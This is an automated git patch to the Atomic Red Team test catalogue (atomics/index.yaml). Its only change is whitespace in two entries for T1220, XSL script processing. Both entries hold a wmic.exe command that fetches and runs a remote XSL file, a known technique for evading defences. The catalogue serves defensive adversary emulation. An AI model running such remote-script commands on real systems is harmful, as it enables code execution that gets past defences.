From 5bbe2e64030ee51dcb2e6f7548a28d494464417e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 5 Dec 2018 00:53:11 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/index.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/atomics/index.yaml b/atomics/index.yaml index 74172f05..183f17bc 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -8681,7 +8681,9 @@ defense-evasion: default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmic-script.xsl executor: name: command_prompt - command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}' + command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file} + +' privilege-escalation: T1134: technique: @@ -16390,7 +16392,9 @@ execution: default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmic-script.xsl executor: name: command_prompt - command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}' + command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file} + +' lateral-movement: T1155: technique: